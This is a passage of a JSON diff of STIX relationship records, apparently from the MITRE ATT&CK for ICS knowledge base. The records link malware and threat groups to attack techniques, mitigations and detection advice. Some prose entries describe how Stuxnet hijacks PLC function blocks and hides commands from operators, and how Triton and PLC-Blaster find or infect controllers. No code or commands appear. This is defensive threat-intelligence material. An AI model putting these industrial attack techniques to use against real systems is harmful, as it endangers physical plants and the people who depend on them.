"[ACAD/Medre.A](https://attack.mitre.org/software/S1000) can collect AutoCad files with drawings. These drawings may contain operational information. (Citation: ESET)\n", + "relationship_type": "uses", + "source_ref": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--351e19c4-c16e-493a-9800-a433107aacf1", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:36.935Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) uses a Python script that is capable of detecting Triconex controllers on the network by sending a specific UDP broadcast packet over port 1502. (Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7bfaf0ff-6d88-460f-aa32-3fb0267b4f20", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.084Z", + "relationship_type": "mitigates", + "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques likeDomain Fronting.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5041e17d-6349-4589-8c61-7b43964b5f9b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.227Z", + "relationship_type": "mitigates", + "description": "Integrity checking of transient assets can include performing the validation of the booted operating system and programs using TPM-based technologies, such as Secure Boot and Trusted Boot. (Citation: Emerson Exchange) It can also include verifying filesystem changes, such as programs and configuration files stored on the system, executing processes, libraries, accounts, and open ports. (Citation: National Security Agency February 2016)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "external_references": [ + { + "source_name": "Emerson Exchange", + "description": "Emerson Exchange Increase Security with TPM, Secure Boot, and Trusted Boot Retrieved. 2020/09/25 ", + "url": "https://emersonexchange365.com/products/control-safety-systems/f/plc-pac-systems-industrial-computing-forum/8383/increase-security-with-tpm-secure-boot-and-trusted-boot" + }, + { + "source_name": "National Security Agency February 2016", + "description": "National Security Agency 2016, February Position Zero: Integrity Checking Windows-Based ICS/SCADA Systems Retrieved. 2020/09/25 ", + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/security-configuration/industrial-control-systems/position-zero-integrity-checking-windows-based-ics-scada-systems.cfm" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f29ecf69-1753-44bb-9b80-1025f49cadda", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:24:02.276Z", + "description": "DP_RECV is the name of a standard function block used by network coprocessors. It is used to receive network frames on the Profibus a standard industrial network bus used for distributed I/O. The original block is copied to FC1869, and then replaced by a malicious block. Each time the function is used to receive a packet, the malicious [Stuxnet](https://attack.mitre.org/software/S0603) block takes control: it will call the original DP_RECV in FC1869 and then perform postprocessing on the packet data. The replaced DP_RECV block (later on referred to as the DP_RECV monitor) is meant to monitor data sent by the frequency converter drives to the 315-2 CPU via CP 342-5 Profibus communication modules. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4631bf49-da0b-4415-a226-112c99ff0f64", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:22:17.841Z", + "description": "Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. For added context on adversary procedures and background see [Remote Services](https://attack.mitre.org/techniques/T1021) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b5ab26e2-eb90-4f19-b35a-b8a0a5438961", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Hydro", + "description": "Hydro Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 Retrieved. 2019/10/16 ", + "url": "https://www.hydro.com/en/media/on-the-agenda/cyber-attack/" + }, + { + "source_name": "Kevin Beaumont", + "description": "Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 ", + "url": "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:57:06.704Z", + "description": "Some of Norsk Hydro's production systems were impacted by a [LockerGoga](https://attack.mitre.org/software/S0372) infection. This resulted in a loss of control which forced the company to switch to manual operations. (Citation: Kevin Beaumont) (Citation: Hydro)", + "relationship_type": "uses", + "source_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--58cb4cb5-4b0f-4ce0-b3f9-5deb9de31c52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.145Z", + "relationship_type": "mitigates", + "description": "Utilize out-of-band communication to validate the integrity of data from the primary channel.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2fbb7867-79c5-4d45-9876-98c4041dd72e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.226Z", + "relationship_type": "mitigates", + "description": "Consider implementing full disk encryption, especially if engineering workstations are transient assets that are more likely to be lost, stolen, or tampered with. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f0c81c9f-2fb7-4e7d-98ed-c75e3be7d962", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:21:24.221Z", + "description": "When the peripheral output is written to, sequence C intercepts the output and ensures it is not written to the process image output. The output is the instructions the PLC sends to a device to change its operating behavior. By intercepting the peripheral output, [Stuxnet](https://attack.mitre.org/software/S0603) prevents an operator from noticing unauthorized commands sent to the peripheral. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--99c0c90e-8526-41d6-80ca-b037598c6326", + "created": "2022-09-26T19:37:35.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:36:13.269Z", + "description": "Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--43777394-ff59-4261-b1cf-b41a1f4f4d8b", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:24:52.417Z", + "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:46.146Z", + "description": "Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6be3917c-aad7-4a3f-bea2-23e4ba4310ee", + "created": "2022-09-29T14:26:04.715Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T14:26:04.715Z", + "description": "Monitor network traffic for hardcoded credential use in protocols that allow unencrypted authentication.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Andy Greenburg June 2019", + "description": "Andy Greenburg 2019, June 20 Iranian Hackers Launch a New US-Targeted Campaign as Tensions Mount Retrieved. 2020/01/03 ", + "url": "https://www.wired.com/story/iran-hackers-us-phishing-tensions/" + }, + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:49.943Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) sent spear phishing emails containing links to HTML application files, which were embedded with malicious code. (Citation: Jacqueline O'Leary et al. September 2017) [APT33](https://attack.mitre.org/groups/G0064) has conducted targeted spear phishing campaigns against U.S. government agencies and private sector companies. (Citation: Andy Greenburg June 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--671043a9-337f-411a-9ca9-3112e897ab09", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.184Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e0d101cc-1284-4e88-82d6-227fe5d19d8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:25.119Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g., destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g., monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, SCF, HTA, MSI, DLLs, or msiexec.exe).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.154Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d2dc57eb-5be2-4f9c-a4f7-18d2085ff412", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Robert Falcone, Bryan Lee May 2016", + "description": "Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19 ", + "url": "https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:32:31.072Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) communicated with its command and control using HTTP requests. (Citation: Robert Falcone, Bryan Lee May 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4f98ce1-d0b8-4699-b602-33a6a6ffca67", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:33:51.166Z", + "description": "Monitor for new master devices communicating with outstation assets, which may be visible in asset application logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--990f944f-190d-456d-b194-f5ecb17a0868", + "created": "2019-06-24T17:20:24.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:40:11.392Z", + "description": "A [Conficker](https://attack.mitre.org/software/S0608) infection at a nuclear power plant forced the facility to temporarily shutdown. (Citation: Catalin Cimpanu April 2016)", + "relationship_type": "uses", + "source_ref": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c85bff0-8f70-479e-9365-fef1e3fe2b95", + "created": "2022-09-27T17:22:27.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:23.870Z", + "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--20f66fab-7a08-4707-ac79-92dac5acd11d", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:00:13.772Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006)'s code is stored in OB9999. The original code on the target is untouched. The OB is automatically detected by the PLC and executed. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1aa02c37-973e-46bd-ab45-609463e514e9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b8b1739d-dfa2-44e9-907f-7085e262512f", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:01:52.517Z", + "description": "Monitor login sessions for new or unexpected devices or sessions on wireless networks.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6b987f2a-3d07-4791-9c1c-e4f6818521e8", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:44:06.211Z", + "description": "Monitor for changes made to Windows Registry keys or values that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. For added context on adversary procedures and background see [Indicator Removal](https://attack.mitre.org/techniques/T1070) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": 